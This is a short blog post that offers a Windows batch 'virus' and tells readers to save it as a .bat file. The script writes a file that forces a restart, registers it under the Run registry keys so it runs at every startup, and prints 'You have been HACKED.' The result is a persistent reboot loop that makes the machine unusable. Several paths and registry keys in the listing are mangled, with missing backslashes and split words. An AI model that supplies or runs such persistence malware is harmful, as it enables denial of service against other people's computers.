virus program to shutdown the computer when it is turned on

Hi everybody, This is a virus file to shutdown the computer every time when the system turned on. Copy this source code in any text editor like notepad, wordpad etc.., and save the file with .bat extension. 

 
Source code:-
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

0 comments:

Post a Comment